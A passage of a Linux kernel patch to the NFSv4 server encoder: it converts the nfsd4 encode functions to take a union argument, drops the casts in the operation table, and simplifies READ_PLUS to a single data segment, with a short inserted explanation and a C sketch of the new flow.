+@@ -4201,8 +4293,10 @@ nfsd4_encode_readdir(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4
+ }
+ 
+ static __be32
+-nfsd4_encode_remove(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_remove *remove)
++nfsd4_encode_remove(struct nfsd4_compoundres *resp, __be32 nfserr,
++		    union nfsd4_op_u *u)
+ {
++	struct nfsd4_remove *remove = &u->remove;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -4214,8 +4308,10 @@ nfsd4_encode_remove(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_
+ }
+ 
+ static __be32
+-nfsd4_encode_rename(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_rename *rename)
++nfsd4_encode_rename(struct nfsd4_compoundres *resp, __be32 nfserr,
++		    union nfsd4_op_u *u)
+ {
++	struct nfsd4_rename *rename = &u->rename;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -4297,8 +4393,9 @@ nfsd4_do_encode_secinfo(struct xdr_stream *xdr, struct svc_export *exp)
+ 
+ static __be32
+ nfsd4_encode_secinfo(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		     struct nfsd4_secinfo *secinfo)
++		     union nfsd4_op_u *u)
+ {
++	struct nfsd4_secinfo *secinfo = &u->secinfo;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 
+ 	return nfsd4_do_encode_secinfo(xdr, secinfo->si_exp);
+@@ -4306,8 +4403,9 @@ nfsd4_encode_secinfo(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_secinfo_no_name(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		     struct nfsd4_secinfo_no_name *secinfo)
++		     union nfsd4_op_u *u)
+ {
++	struct nfsd4_secinfo_no_name *secinfo = &u->secinfo_no_name;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 
+ 	return nfsd4_do_encode_secinfo(xdr, secinfo->sin_exp);
+@@ -4318,8 +4416,10 @@ nfsd4_encode_secinfo_no_name(struct nfsd4_compoundres *resp, __be32 nfserr,
+  * regardless of the error status.
+  */
+ static __be32
+-nfsd4_encode_setattr(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_setattr *setattr)
++nfsd4_encode_setattr(struct nfsd4_compoundres *resp, __be32 nfserr,
++		     union nfsd4_op_u *u)
+ {
++	struct nfsd4_setattr *setattr = &u->setattr;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -4342,8 +4442,10 @@ nfsd4_encode_setattr(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4
+ }
+ 
+ static __be32
+-nfsd4_encode_setclientid(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_setclientid *scd)
++nfsd4_encode_setclientid(struct nfsd4_compoundres *resp, __be32 nfserr,
++			 union nfsd4_op_u *u)
+ {
++	struct nfsd4_setclientid *scd = &u->setclientid;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -4366,8 +4468,10 @@ nfsd4_encode_setclientid(struct nfsd4_compoundres *resp, __be32 nfserr, struct n
+ }
+ 
+ static __be32
+-nfsd4_encode_write(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_write *write)
++nfsd4_encode_write(struct nfsd4_compoundres *resp, __be32 nfserr,
++		   union nfsd4_op_u *u)
+ {
++	struct nfsd4_write *write = &u->write;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -4383,8 +4487,9 @@ nfsd4_encode_write(struct nfsd4_compoundres *resp, __be32 nfserr, struct nfsd4_w
+ 
+ static __be32
+ nfsd4_encode_exchange_id(struct nfsd4_compoundres *resp, __be32 nfserr,
+-			 struct nfsd4_exchange_id *exid)
++			 union nfsd4_op_u *u)
+ {
++	struct nfsd4_exchange_id *exid = &u->exchange_id;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 	char *major_id;
+@@ -4461,8 +4566,9 @@ nfsd4_encode_exchange_id(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_create_session(struct nfsd4_compoundres *resp, __be32 nfserr,
+-			    struct nfsd4_create_session *sess)
++			    union nfsd4_op_u *u)
+ {
++	struct nfsd4_create_session *sess = &u->create_session;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -4514,8 +4620,9 @@ nfsd4_encode_create_session(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_sequence(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		      struct nfsd4_sequence *seq)
++		      union nfsd4_op_u *u)
+ {
++	struct nfsd4_sequence *seq = &u->sequence;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -4537,8 +4644,9 @@ nfsd4_encode_sequence(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_test_stateid(struct nfsd4_compoundres *resp, __be32 nfserr,
+-			  struct nfsd4_test_stateid *test_stateid)
++			  union nfsd4_op_u *u)
+ {
++	struct nfsd4_test_stateid *test_stateid = &u->test_stateid;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	struct nfsd4_test_stateid_id *stateid, *next;
+ 	__be32 *p;
+@@ -4558,8 +4666,9 @@ nfsd4_encode_test_stateid(struct nfsd4_compoundres *resp, __be32 nfserr,
+ #ifdef CONFIG_NFSD_PNFS
+ static __be32
+ nfsd4_encode_getdeviceinfo(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		struct nfsd4_getdeviceinfo *gdev)
++		union nfsd4_op_u *u)
+ {
++	struct nfsd4_getdeviceinfo *gdev = &u->getdeviceinfo;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	const struct nfsd4_layout_ops *ops;
+ 	u32 starting_len = xdr->buf->len, needed_len;
+@@ -4611,8 +4720,9 @@ nfsd4_encode_getdeviceinfo(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_layoutget(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		struct nfsd4_layoutget *lgp)
++		union nfsd4_op_u *u)
+ {
++	struct nfsd4_layoutget *lgp = &u->layoutget;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	const struct nfsd4_layout_ops *ops;
+ 	__be32 *p;
+@@ -4638,8 +4748,9 @@ nfsd4_encode_layoutget(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_layoutcommit(struct nfsd4_compoundres *resp, __be32 nfserr,
+-			  struct nfsd4_layoutcommit *lcp)
++			  union nfsd4_op_u *u)
+ {
++	struct nfsd4_layoutcommit *lcp = &u->layoutcommit;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -4659,8 +4770,9 @@ nfsd4_encode_layoutcommit(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_layoutreturn(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		struct nfsd4_layoutreturn *lrp)
++		union nfsd4_op_u *u)
+ {
++	struct nfsd4_layoutreturn *lrp = &u->layoutreturn;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -4745,8 +4857,9 @@ nfsd42_encode_nl4_server(struct nfsd4_compoundres *resp, struct nl4_server *ns)
+ 
+ static __be32
+ nfsd4_encode_copy(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		  struct nfsd4_copy *copy)
++		  union nfsd4_op_u *u)
+ {
++	struct nfsd4_copy *copy = &u->copy;
+ 	__be32 *p;
+ 
+ 	nfserr = nfsd42_encode_write_res(resp, &copy->cp_res,
+@@ -4762,8 +4875,9 @@ nfsd4_encode_copy(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_offload_status(struct nfsd4_compoundres *resp, __be32 nfserr,
+-			    struct nfsd4_offload_status *os)
++			    union nfsd4_op_u *u)
+ {
++	struct nfsd4_offload_status *os = &u->offload_status;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -4777,156 +4891,83 @@ nfsd4_encode_offload_status(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_read_plus_data(struct nfsd4_compoundres *resp,
+-			    struct nfsd4_read *read,
+-			    unsigned long *maxcount, u32 *eof,
+-			    loff_t *pos)
++			    struct nfsd4_read *read)
+ {
+-	struct xdr_stream *xdr = resp->xdr;
++	bool splice_ok = test_bit(RQ_SPLICE_OK, &resp->rqstp->rq_flags);
+ 	struct file *file = read->rd_nf->nf_file;
+-	int starting_len = xdr->buf->len;
+-	loff_t hole_pos;
+-	__be32 nfserr;
+-	__be32 *p, tmp;
+-	__be64 tmp64;
+-
+-	hole_pos = pos ? *pos : vfs_llseek(file, read->rd_offset, SEEK_HOLE);
+-	if (hole_pos > read->rd_offset)
+-		*maxcount = min_t(unsigned long, *maxcount, hole_pos - read->rd_offset);
+-	*maxcount = min_t(unsigned long, *maxcount, (xdr->buf->buflen - xdr->buf->len));
++	struct xdr_stream *xdr = resp->xdr;
++	unsigned long maxcount;
++	__be32 nfserr, *p;
+ 
+ 	/* Content type, offset, byte count */
+ 	p = xdr_reserve_space(xdr, 4 + 8 + 4);
+ 	if (!p)
+-		return nfserr_resource;
++		return nfserr_io;
++	if (resp->xdr->buf->page_len && splice_ok) {
++		WARN_ON_ONCE(splice_ok);
++		return nfserr_serverfault;
++	}
+ 
+-	read->rd_vlen = xdr_reserve_space_vec(xdr, resp->rqstp->rq_vec, *maxcount);
+-	if (read->rd_vlen < 0)
+-		return nfserr_resource;
++	maxcount = min_t(unsigned long, read->rd_length,
++			 (xdr->buf->buflen - xdr->buf->len));
+ 
+-	nfserr = nfsd_readv(resp->rqstp, read->rd_fhp, file, read->rd_offset,
+-			    resp->rqstp->rq_vec, read->rd_vlen, maxcount, eof);
++	if (file->f_op->splice_read && splice_ok)
++		nfserr = nfsd4_encode_splice_read(resp, read, file, maxcount);
++	else
++		nfserr = nfsd4_encode_readv(resp, read, file, maxcount);
+ 	if (nfserr)
+ 		return nfserr;
+-	xdr_truncate_encode(xdr, starting_len + 16 + xdr_align_size(*maxcount));
+-
+-	tmp = htonl(NFS4_CONTENT_DATA);
+-	write_bytes_to_xdr_buf(xdr->buf, starting_len,      &tmp,   4);
+-	tmp64 = cpu_to_be64(read->rd_offset);
+-	write_bytes_to_xdr_buf(xdr->buf, starting_len + 4,  &tmp64, 8);
+-	tmp = htonl(*maxcount);
+-	write_bytes_to_xdr_buf(xdr->buf, starting_len + 12, &tmp,   4);
+-
+-	tmp = xdr_zero;
+-	write_bytes_to_xdr_buf(xdr->buf, starting_len + 16 + *maxcount, &tmp,
+-			       xdr_pad_size(*maxcount));
+-	return nfs_ok;
+-}
+-
+-static __be32
+-nfsd4_encode_read_plus_hole(struct nfsd4_compoundres *resp,
+-			    struct nfsd4_read *read,
+-			    unsigned long *maxcount, u32 *eof)
+-{
+-	struct file *file = read->rd_nf->nf_file;
+-	loff_t data_pos = vfs_llseek(file, read->rd_offset, SEEK_DATA);
+-	loff_t f_size = i_size_read(file_inode(file));
+-	unsigned long count;
+-	__be32 *p;
+-
+-	if (data_pos == -ENXIO)
+-		data_pos = f_size;
+-	else if (data_pos <= read->rd_offset || (data_pos < f_size && data_pos % PAGE_SIZE))
+-		return nfsd4_encode_read_plus_data(resp, read, maxcount, eof, &f_size);
+-	count = data_pos - read->rd_offset;
+ 
+-	/* Content type, offset, byte count */
+-	p = xdr_reserve_space(resp->xdr, 4 + 8 + 8);
+-	if (!p)
+-		return nfserr_resource;
+-
+-	*p++ = htonl(NFS4_CONTENT_HOLE);
++	*p++ = cpu_to_be32(NFS4_CONTENT_DATA);
+ 	p = xdr_encode_hyper(p, read->rd_offset);
+-	p = xdr_encode_hyper(p, count);
++	*p = cpu_to_be32(read->rd_length);
+ 
+-	*eof = (read->rd_offset + count) >= f_size;
+-	*maxcount = min_t(unsigned long, count, *maxcount);
+ 	return nfs_ok;
+ }
+ 
+ static __be32
+ nfsd4_encode_read_plus(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		       struct nfsd4_read *read)
++		       union nfsd4_op_u *u)
+ {
+-	unsigned long maxcount, count;
++	struct nfsd4_read *read = &u->read;
++	struct file *file = read->rd_nf->nf_file;
+ 	struct xdr_stream *xdr = resp->xdr;
+-	struct file *file;
+ 	int starting_len = xdr->buf->len;
+-	int last_segment = xdr->buf->len;
+-	int segments = 0;
+-	__be32 *p, tmp;
+-	bool is_data;
+-	loff_t pos;
+-	u32 eof;
++	u32 segments = 0;
++	__be32 *p;
+ 
+ 	if (nfserr)
+ 		return nfserr;
+-	file = read->rd_nf->nf_file;
+ 
+ 	/* eof flag, segment count */
+ 	p = xdr_reserve_space(xdr, 4 + 4);
+ 	if (!p)
+-		return nfserr_resource;
++		return nfserr_io;
+ 	xdr_commit_encode(xdr);
+ 
+-	maxcount = min_t(unsigned long, read->rd_length,
+-			 (xdr->buf->buflen - xdr->buf->len));
+-	count    = maxcount;
+-
+-	eof = read->rd_offset >= i_size_read(file_inode(file));
+-	if (eof)
++	read->rd_eof = read->rd_offset >= i_size_read(file_inode(file));
++	if (read->rd_eof)
+ 		goto out;
+ 
+-	pos = vfs_llseek(file, read->rd_offset, SEEK_HOLE);
+-	is_data = pos > read->rd_offset;
+-
+-	while (count > 0 && !eof) {
+-		maxcount = count;
+-		if (is_data)
+-			nfserr = nfsd4_encode_read_plus_data(resp, read, &maxcount, &eof,
+-						segments == 0 ? &pos : NULL);
+-		else
+-			nfserr = nfsd4_encode_read_plus_hole(resp, read, &maxcount, &eof);
+-		if (nfserr)
+-			goto out;
+-		count -= maxcount;
+-		read->rd_offset += maxcount;
+-		is_data = !is_data;
+-		last_segment = xdr->buf->len;
+-		segments++;
+-	}
+-
+-out:
+-	if (nfserr && segments == 0)
++	nfserr = nfsd4_encode_read_plus_data(resp, read);
++	if (nfserr) {
+ 		xdr_truncate_encode(xdr, starting_len);
+-	else {
+-		if (nfserr) {
+-			xdr_truncate_encode(xdr, last_segment);
+-			nfserr = nfs_ok;
+-			eof = 0;
+-		}
+-		tmp = htonl(eof);
+-		write_bytes_to_xdr_buf(xdr->buf, starting_len,     &tmp, 4);
+-		tmp = htonl(segments);
+-		write_bytes_to_xdr_buf(xdr->buf, starting_len + 4, &tmp, 4);
++		return nfserr;
+ 	}
+ 
++	segments++;
++
++out:
++	p = xdr_encode_bool(p, read->rd_eof);
++	*p = cpu_to_be32(segments);
+ 	return nfserr;
+ }
+ 
+ static __be32
+ nfsd4_encode_copy_notify(struct nfsd4_compoundres *resp, __be32 nfserr,
+-			 struct nfsd4_copy_notify *cn)
++			 union nfsd4_op_u *u)
+ {
++	struct nfsd4_copy_notify *cn = &u->copy_notify;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
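The READ_PLUS hunk above replaces the data/hole segmentation loop with a much simpler encoder: the reply now carries the EOF flag, a segment count of zero or one, and at most a single DATA segment, leaving sparse-file hole detection to the client. A rough sketch of the new control flow, with invented types standing in for the kernel's xdr_stream machinery (the real code sets rd_eof inside the read path rather than recomputing it):

#include <stdbool.h>
#include <stdio.h>

struct read_args { long offset; long length; long file_size; };

/*
 * Emit the EOF flag and a segment count of 0 or 1 -- never a chain
 * of alternating DATA and HOLE segments as before.
 */
static int encode_read_plus(const struct read_args *rd)
{
	bool eof = rd->offset >= rd->file_size;
	unsigned int segments = 0;

	if (!eof) {
		printf("DATA segment: offset=%ld length=%ld\n",
		       rd->offset, rd->length);
		segments = 1;
		eof = rd->offset + rd->length >= rd->file_size;
	}
	printf("eof=%d segments=%u\n", eof, segments);
	return 0;
}

int main(void)
{
	struct read_args rd = { .offset = 0, .length = 4096, .file_size = 8192 };
	return encode_read_plus(&rd);
}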
+@@ -4960,8 +5001,9 @@ nfsd4_encode_copy_notify(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_seek(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		  struct nfsd4_seek *seek)
++		  union nfsd4_op_u *u)
+ {
++	struct nfsd4_seek *seek = &u->seek;
+ 	__be32 *p;
+ 
+ 	p = xdr_reserve_space(resp->xdr, 4 + 8);
+@@ -4972,7 +5014,8 @@ nfsd4_encode_seek(struct nfsd4_compoundres *resp, __be32 nfserr,
+ }
+ 
+ static __be32
+-nfsd4_encode_noop(struct nfsd4_compoundres *resp, __be32 nfserr, void *p)
++nfsd4_encode_noop(struct nfsd4_compoundres *resp, __be32 nfserr,
++		  union nfsd4_op_u *p)
+ {
+ 	return nfserr;
+ }
+@@ -5023,8 +5066,9 @@ nfsd4_vbuf_to_stream(struct xdr_stream *xdr, char *buf, u32 buflen)
+ 
+ static __be32
+ nfsd4_encode_getxattr(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		      struct nfsd4_getxattr *getxattr)
++		      union nfsd4_op_u *u)
+ {
++	struct nfsd4_getxattr *getxattr = &u->getxattr;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p, err;
+ 
+@@ -5047,8 +5091,9 @@ nfsd4_encode_getxattr(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_setxattr(struct nfsd4_compoundres *resp, __be32 nfserr,
+-		      struct nfsd4_setxattr *setxattr)
++		      union nfsd4_op_u *u)
+ {
++	struct nfsd4_setxattr *setxattr = &u->setxattr;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -5088,8 +5133,9 @@ nfsd4_listxattr_validate_cookie(struct nfsd4_listxattrs *listxattrs,
+ 
+ static __be32
+ nfsd4_encode_listxattrs(struct nfsd4_compoundres *resp, __be32 nfserr,
+-			struct nfsd4_listxattrs *listxattrs)
++			union nfsd4_op_u *u)
+ {
++	struct nfsd4_listxattrs *listxattrs = &u->listxattrs;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	u32 cookie_offset, count_offset, eof;
+ 	u32 left, xdrleft, slen, count;
+@@ -5199,8 +5245,9 @@ nfsd4_encode_listxattrs(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 
+ static __be32
+ nfsd4_encode_removexattr(struct nfsd4_compoundres *resp, __be32 nfserr,
+-			 struct nfsd4_removexattr *removexattr)
++			 union nfsd4_op_u *u)
+ {
++	struct nfsd4_removexattr *removexattr = &u->removexattr;
+ 	struct xdr_stream *xdr = resp->xdr;
+ 	__be32 *p;
+ 
+@@ -5212,7 +5259,7 @@ nfsd4_encode_removexattr(struct nfsd4_compoundres *resp, __be32 nfserr,
+ 	return 0;
+ }
+ 
+-typedef __be32(* nfsd4_enc)(struct nfsd4_compoundres *, __be32, void *);
++typedef __be32(*nfsd4_enc)(struct nfsd4_compoundres *, __be32, union nfsd4_op_u *u);
+ 
+ /*
+  * Note: nfsd4_enc_ops vector is shared for v4.0 and v4.1
+@@ -5220,93 +5267,93 @@ typedef __be32(* nfsd4_enc)(struct nfsd4_compoundres *, __be32, void *);
+  * done in the decoding phase.
+  */
+ static const nfsd4_enc nfsd4_enc_ops[] = {
+-	[OP_ACCESS]		= (nfsd4_enc)nfsd4_encode_access,
+-	[OP_CLOSE]		= (nfsd4_enc)nfsd4_encode_close,
+-	[OP_COMMIT]		= (nfsd4_enc)nfsd4_encode_commit,
+-	[OP_CREATE]		= (nfsd4_enc)nfsd4_encode_create,
+-	[OP_DELEGPURGE]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_DELEGRETURN]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_GETATTR]		= (nfsd4_enc)nfsd4_encode_getattr,
+-	[OP_GETFH]		= (nfsd4_enc)nfsd4_encode_getfh,
+-	[OP_LINK]		= (nfsd4_enc)nfsd4_encode_link,
+-	[OP_LOCK]		= (nfsd4_enc)nfsd4_encode_lock,
+-	[OP_LOCKT]		= (nfsd4_enc)nfsd4_encode_lockt,
+-	[OP_LOCKU]		= (nfsd4_enc)nfsd4_encode_locku,
+-	[OP_LOOKUP]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_LOOKUPP]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_NVERIFY]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_OPEN]		= (nfsd4_enc)nfsd4_encode_open,
+-	[OP_OPENATTR]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_OPEN_CONFIRM]	= (nfsd4_enc)nfsd4_encode_open_confirm,
+-	[OP_OPEN_DOWNGRADE]	= (nfsd4_enc)nfsd4_encode_open_downgrade,
+-	[OP_PUTFH]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_PUTPUBFH]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_PUTROOTFH]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_READ]		= (nfsd4_enc)nfsd4_encode_read,
+-	[OP_READDIR]		= (nfsd4_enc)nfsd4_encode_readdir,
+-	[OP_READLINK]		= (nfsd4_enc)nfsd4_encode_readlink,
+-	[OP_REMOVE]		= (nfsd4_enc)nfsd4_encode_remove,
+-	[OP_RENAME]		= (nfsd4_enc)nfsd4_encode_rename,
+-	[OP_RENEW]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_RESTOREFH]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_SAVEFH]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_SECINFO]		= (nfsd4_enc)nfsd4_encode_secinfo,
+-	[OP_SETATTR]		= (nfsd4_enc)nfsd4_encode_setattr,
+-	[OP_SETCLIENTID]	= (nfsd4_enc)nfsd4_encode_setclientid,
+-	[OP_SETCLIENTID_CONFIRM] = (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_VERIFY]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_WRITE]		= (nfsd4_enc)nfsd4_encode_write,
+-	[OP_RELEASE_LOCKOWNER]	= (nfsd4_enc)nfsd4_encode_noop,
++	[OP_ACCESS]		= nfsd4_encode_access,
++	[OP_CLOSE]		= nfsd4_encode_close,
++	[OP_COMMIT]		= nfsd4_encode_commit,
++	[OP_CREATE]		= nfsd4_encode_create,
++	[OP_DELEGPURGE]		= nfsd4_encode_noop,
++	[OP_DELEGRETURN]	= nfsd4_encode_noop,
++	[OP_GETATTR]		= nfsd4_encode_getattr,
++	[OP_GETFH]		= nfsd4_encode_getfh,
++	[OP_LINK]		= nfsd4_encode_link,
++	[OP_LOCK]		= nfsd4_encode_lock,
++	[OP_LOCKT]		= nfsd4_encode_lockt,
++	[OP_LOCKU]		= nfsd4_encode_locku,
++	[OP_LOOKUP]		= nfsd4_encode_noop,
++	[OP_LOOKUPP]		= nfsd4_encode_noop,
++	[OP_NVERIFY]		= nfsd4_encode_noop,
++	[OP_OPEN]		= nfsd4_encode_open,
++	[OP_OPENATTR]		= nfsd4_encode_noop,
++	[OP_OPEN_CONFIRM]	= nfsd4_encode_open_confirm,
++	[OP_OPEN_DOWNGRADE]	= nfsd4_encode_open_downgrade,
++	[OP_PUTFH]		= nfsd4_encode_noop,
++	[OP_PUTPUBFH]		= nfsd4_encode_noop,
++	[OP_PUTROOTFH]		= nfsd4_encode_noop,
++	[OP_READ]		= nfsd4_encode_read,
++	[OP_READDIR]		= nfsd4_encode_readdir,
++	[OP_READLINK]		= nfsd4_encode_readlink,
++	[OP_REMOVE]		= nfsd4_encode_remove,
++	[OP_RENAME]		= nfsd4_encode_rename,
++	[OP_RENEW]		= nfsd4_encode_noop,
++	[OP_RESTOREFH]		= nfsd4_encode_noop,
++	[OP_SAVEFH]		= nfsd4_encode_noop,
++	[OP_SECINFO]		= nfsd4_encode_secinfo,
++	[OP_SETATTR]		= nfsd4_encode_setattr,
++	[OP_SETCLIENTID]	= nfsd4_encode_setclientid,
++	[OP_SETCLIENTID_CONFIRM] = nfsd4_encode_noop,
++	[OP_VERIFY]		= nfsd4_encode_noop,
++	[OP_WRITE]		= nfsd4_encode_write,
++	[OP_RELEASE_LOCKOWNER]	= nfsd4_encode_noop,
+ 
+ 	/* NFSv4.1 operations */
+-	[OP_BACKCHANNEL_CTL]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_BIND_CONN_TO_SESSION] = (nfsd4_enc)nfsd4_encode_bind_conn_to_session,
+-	[OP_EXCHANGE_ID]	= (nfsd4_enc)nfsd4_encode_exchange_id,
+-	[OP_CREATE_SESSION]	= (nfsd4_enc)nfsd4_encode_create_session,
+-	[OP_DESTROY_SESSION]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_FREE_STATEID]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_GET_DIR_DELEGATION]	= (nfsd4_enc)nfsd4_encode_noop,
++	[OP_BACKCHANNEL_CTL]	= nfsd4_encode_noop,
++	[OP_BIND_CONN_TO_SESSION] = nfsd4_encode_bind_conn_to_session,
++	[OP_EXCHANGE_ID]	= nfsd4_encode_exchange_id,
++	[OP_CREATE_SESSION]	= nfsd4_encode_create_session,
++	[OP_DESTROY_SESSION]	= nfsd4_encode_noop,
++	[OP_FREE_STATEID]	= nfsd4_encode_noop,
++	[OP_GET_DIR_DELEGATION]	= nfsd4_encode_noop,
+ #ifdef CONFIG_NFSD_PNFS
+-	[OP_GETDEVICEINFO]	= (nfsd4_enc)nfsd4_encode_getdeviceinfo,
+-	[OP_GETDEVICELIST]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_LAYOUTCOMMIT]	= (nfsd4_enc)nfsd4_encode_layoutcommit,
+-	[OP_LAYOUTGET]		= (nfsd4_enc)nfsd4_encode_layoutget,
+-	[OP_LAYOUTRETURN]	= (nfsd4_enc)nfsd4_encode_layoutreturn,
++	[OP_GETDEVICEINFO]	= nfsd4_encode_getdeviceinfo,
++	[OP_GETDEVICELIST]	= nfsd4_encode_noop,
++	[OP_LAYOUTCOMMIT]	= nfsd4_encode_layoutcommit,
++	[OP_LAYOUTGET]		= nfsd4_encode_layoutget,
++	[OP_LAYOUTRETURN]	= nfsd4_encode_layoutreturn,
+ #else
+-	[OP_GETDEVICEINFO]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_GETDEVICELIST]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_LAYOUTCOMMIT]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_LAYOUTGET]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_LAYOUTRETURN]	= (nfsd4_enc)nfsd4_encode_noop,
++	[OP_GETDEVICEINFO]	= nfsd4_encode_noop,
++	[OP_GETDEVICELIST]	= nfsd4_encode_noop,
++	[OP_LAYOUTCOMMIT]	= nfsd4_encode_noop,
++	[OP_LAYOUTGET]		= nfsd4_encode_noop,
++	[OP_LAYOUTRETURN]	= nfsd4_encode_noop,
+ #endif
+-	[OP_SECINFO_NO_NAME]	= (nfsd4_enc)nfsd4_encode_secinfo_no_name,
+-	[OP_SEQUENCE]		= (nfsd4_enc)nfsd4_encode_sequence,
+-	[OP_SET_SSV]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_TEST_STATEID]	= (nfsd4_enc)nfsd4_encode_test_stateid,
+-	[OP_WANT_DELEGATION]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_DESTROY_CLIENTID]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_RECLAIM_COMPLETE]	= (nfsd4_enc)nfsd4_encode_noop,
++	[OP_SECINFO_NO_NAME]	= nfsd4_encode_secinfo_no_name,
++	[OP_SEQUENCE]		= nfsd4_encode_sequence,
++	[OP_SET_SSV]		= nfsd4_encode_noop,
++	[OP_TEST_STATEID]	= nfsd4_encode_test_stateid,
++	[OP_WANT_DELEGATION]	= nfsd4_encode_noop,
++	[OP_DESTROY_CLIENTID]	= nfsd4_encode_noop,
++	[OP_RECLAIM_COMPLETE]	= nfsd4_encode_noop,
+ 
+ 	/* NFSv4.2 operations */
+-	[OP_ALLOCATE]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_COPY]		= (nfsd4_enc)nfsd4_encode_copy,
+-	[OP_COPY_NOTIFY]	= (nfsd4_enc)nfsd4_encode_copy_notify,
+-	[OP_DEALLOCATE]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_IO_ADVISE]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_LAYOUTERROR]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_LAYOUTSTATS]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_OFFLOAD_CANCEL]	= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_OFFLOAD_STATUS]	= (nfsd4_enc)nfsd4_encode_offload_status,
+-	[OP_READ_PLUS]		= (nfsd4_enc)nfsd4_encode_read_plus,
+-	[OP_SEEK]		= (nfsd4_enc)nfsd4_encode_seek,
+-	[OP_WRITE_SAME]		= (nfsd4_enc)nfsd4_encode_noop,
+-	[OP_CLONE]		= (nfsd4_enc)nfsd4_encode_noop,
++	[OP_ALLOCATE]		= nfsd4_encode_noop,
++	[OP_COPY]		= nfsd4_encode_copy,
++	[OP_COPY_NOTIFY]	= nfsd4_encode_copy_notify,
++	[OP_DEALLOCATE]		= nfsd4_encode_noop,
++	[OP_IO_ADVISE]		= nfsd4_encode_noop,
++	[OP_LAYOUTERROR]	= nfsd4_encode_noop,
